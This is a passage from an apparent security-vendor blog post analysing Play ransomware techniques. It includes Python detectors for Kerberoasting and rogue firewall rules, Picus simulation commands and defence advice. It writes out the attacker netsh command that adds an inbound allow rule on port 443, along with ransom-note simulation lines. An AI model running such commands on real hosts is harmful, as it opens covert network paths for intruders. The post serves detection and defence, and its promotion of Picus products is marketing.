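    by_account: Dict[str, List[Tuple[datetime, str]]] = {}
    for line in lines:
        ts, fields = parse_4769(line)
        if is_roastable_request(fields):
            by_account.setdefault(fields["TargetUserName"], []).append((ts, fields["ServiceName"]))
    alerts: Dict[str, set] = {}
    for account, requests in by_account.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):   # sliding window from each request
            services = {svc for t, svc in requests[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts.setdefault(account, set()).update(services)
    return {account: sorted(services) for account, services in alerts.items()}


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_4769).items():
        print(f"ALERT possible Kerberoasting by {account}: {services}")
```

jdoe fires on four RC4 tickets in three seconds; the machine-account and AES requests are ignored, and asmith's three RC4 tickets spread across a working day stay under the threshold. The cheapest preventive counterpart is to move service accounts to AES-only (msDS-SupportedEncryptionTypes) and long random passwords or group Managed Service Accounts, which makes the cracking step impractical even when the request goes unnoticed.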

TA0011: Command and Control

T1090.001 - Proxy: Internal Proxy

Creating a Firewall Rule using the Netsh Tool

Play ransomware has been observed using the built-in Windows netsh command to add firewall rules, opening an inbound path that the host firewall would otherwise block.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves creating a firewall rule using the Netsh tool.

By executing the following command, Picus SCV mimics the malware creating an inbound rule named "adb" that allows traffic to TCP port 443. On a web server inbound 443 is ordinary HTTPS, but on a workstation nothing should be listening there; the rule lets a listener the actors stage on the host (a proxy or C2 relay, which is the sense of the T1090.001 mapping) accept connections from the rest of the network. Rules like this survive reboots and are easy to overlook among the hundreds of default rules, so they deserve periodic auditing as well as detection at creation time (Security event 4946).

cmd.exe /c netsh advfirewall firewall add rule name="adb" dir=in action=allow protocol=TCP localport=443
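
As an added auditing example (not Picus's code and not from the Play actors), the following Python parses the output of netsh advfirewall firewall show rule name=all and flags enabled inbound allow rules that are not part of a Windows feature group, the shape that netsh abuse produces. The netsh output below is constructed; the set of sensitive ports is an assumption to adjust per role (a web server will legitimately allow 443).

```python
from typing import Dict, List

# Constructed excerpt of 'netsh advfirewall firewall show rule name=all'.
SAMPLE_NETSH_OUTPUT = """
Rule Name:                            adb
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            443
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Core Networking - DHCP (DHCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:                             Core Networking
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            68
RemotePort:                           67
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Remote Desktop - User Mode (TCP-In)
----------------------------------------------------------------------
Enabled:                              No
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:                             Remote Desktop
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            3389
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow
Ok.
"""

# Assumed ports where an unexpected inbound allow deserves a look on a workstation.
SENSITIVE_PORTS = {"443", "445", "3389", "5985", "5986"}


def parse_netsh_rules(output: str) -> List[Dict[str, str]]:
    """Turn netsh's 'Key:  value' blocks into one dict per rule, in display order."""
    rules: List[Dict[str, str]] = []
    current = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or set(line) == {"-"} or ":" not in line:
            continue                                    # blank, separator, or 'Ok.' footer
        key, value = (s.strip() for s in line.split(":", 1))
        if key == "Rule Name":
            current = {"Rule Name": value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def flag_adhoc_inbound_allows(rules: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Enabled inbound allow rules with no feature group, with the reasons they stand out."""
    flagged: List[Dict[str, object]] = []
    for rule in rules:
        if (rule.get("Direction"), rule.get("Action"), rule.get("Enabled")) != ("In", "Allow", "Yes"):
            continue
        if rule.get("Grouping"):
            continue            # created through a Windows feature group; review under that group
        reasons = ["enabled inbound allow rule with no feature group"]
        if rule.get("RemoteIP", "Any") == "Any":
            reasons.append("reachable from any remote address")
        if rule.get("LocalPort") in SENSITIVE_PORTS:
            reasons.append(f"listens on sensitive port {rule['LocalPort']}")
        flagged.append({**rule, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for rule in flag_adhoc_inbound_allows(parse_netsh_rules(SAMPLE_NETSH_OUTPUT)):
        print(f"{rule['Rule Name']!r}: " + "; ".join(rule["reasons"]))
```

On a live host, feed the script the real output (netsh advfirewall firewall show rule name=all verbose adds the Program field, which lets you also flag rules not bound to any executable) and compare against a golden baseline taken from a clean build; the "adb" rule from the simulation is the only one flagged here.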

TA0040: Impact

T1491.001 - Defacement: Internal Defacement

Play ransomware was observed attempting to write a file to the C drive, likely to inform the victim about the attack. It then opens the file using notepad.exe, ensuring that the victim sees the ransom note or instructions immediately. 

This tactic is commonly used by ransomware operators to deliver their demands in a straightforward manner.

How Do We Help?

One of the threats added to the Picus Threat Library for Play Ransomware—as part of the Picus Security Control Validation product—involves leveraging the built-in tool notepad.exe in Windows OS.

# play process
cmd.exe /c notepad.exe "C:\ReadMe.txt"


# rewind process 1
taskkill.exe /f /im notepad.exe
# rewind process 2
cmd.exe /c del "C:\ReadMe.txt"

How Does Picus Help Against the Play Ransomware Threat Group?

We strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.  

Picus Threat Library includes the following threats for Play Ransomware.

Threat ID | Threat Name                     | Attack Module
95549     | Play Ransomware Campaign        | Windows Endpoint
28161     | Play Ransomware Download Threat | Network Infiltration
38463     | Play Ransomware Email Threat    | E-mail Infiltration

Defense Strategies Against Play Ransomware Attacks

Below are four key defense strategies to help mitigate the threat posed by Play ransomware attacks:

Deploy Advanced Endpoint Detection and Response (EDR) Solutions

Use EDR and next-generation antivirus tools that monitor for unusual behaviors, such as unauthorized process execution, log clearing, LSASS access, and lateral movement. These solutions can detect the atypical command executions and privilege escalation techniques employed by Play ransomware, helping to isolate and remediate compromised endpoints early in the attack chain.

Continuously Test and Validate Security Controls

Enhance your security posture by regularly testing the effectiveness of your prevention and detection controls. Use Breach and Attack Simulation (BAS) solutions, such as the Picus Security Control Validation (SCV) product, to simulate real-world attack scenarios. This continuous validation process reveals control gaps and provides actionable recommendations, ensuring that your defenses remain robust against evolving threats.

Implement Network Segmentation and a Zero Trust Model

Limit lateral movement by segmenting networks and enforcing strict access controls. With a zero trust approach—including multi-factor authentication and least privilege access—if an endpoint is breached, attackers are confined to a limited portion of the network. This containment helps prevent the spread of ransomware across critical systems. 

Maintain Regular, Immutable Offline Backups and an Incident Response Plan

Regularly back up critical data using air-gapped or immutable storage that ransomware cannot alter or delete. Coupled with a well-practiced incident response plan (including network isolation procedures), this strategy ensures you can restore systems quickly, even if attackers disable local recovery options like Volume Shadow Copies. 

By integrating these layered defenses, organizations can significantly reduce the risk and potential impact of Play Ransomware attacks.

Conclusion

Play ransomware has emerged as one of the most aggressive cyber extortion groups, using a well-rehearsed set of tactics, techniques, and procedures (TTPs) to infiltrate, persist, and evade detection. By abusing legitimate and dual-use tools such as Cobalt Strike, Mimikatz, ProcDump, AdFind, and winPEAS, the group conducts credential theft, privilege escalation, lateral movement, and data exfiltration. Their reliance on scheduled tasks, firewall rule modifications, and LOLBins (Living-Off-the-Land Binaries) makes detection difficult, allowing them to maintain control over compromised systems.

To combat this evolving threat, organizations must deploy advanced endpoint detection and response (EDR) solutions, continuously validate security controls, enforce network segmentation, and maintain immutable backups. A proactive security posture is essential to minimizing the risk of Play ransomware and strengthening resilience against modern cyber threats.
